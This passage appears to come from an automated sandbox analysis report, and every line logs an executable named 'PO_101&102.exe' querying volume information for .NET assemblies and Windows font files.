          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Users\user\Desktop\PO_101&102.exe VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
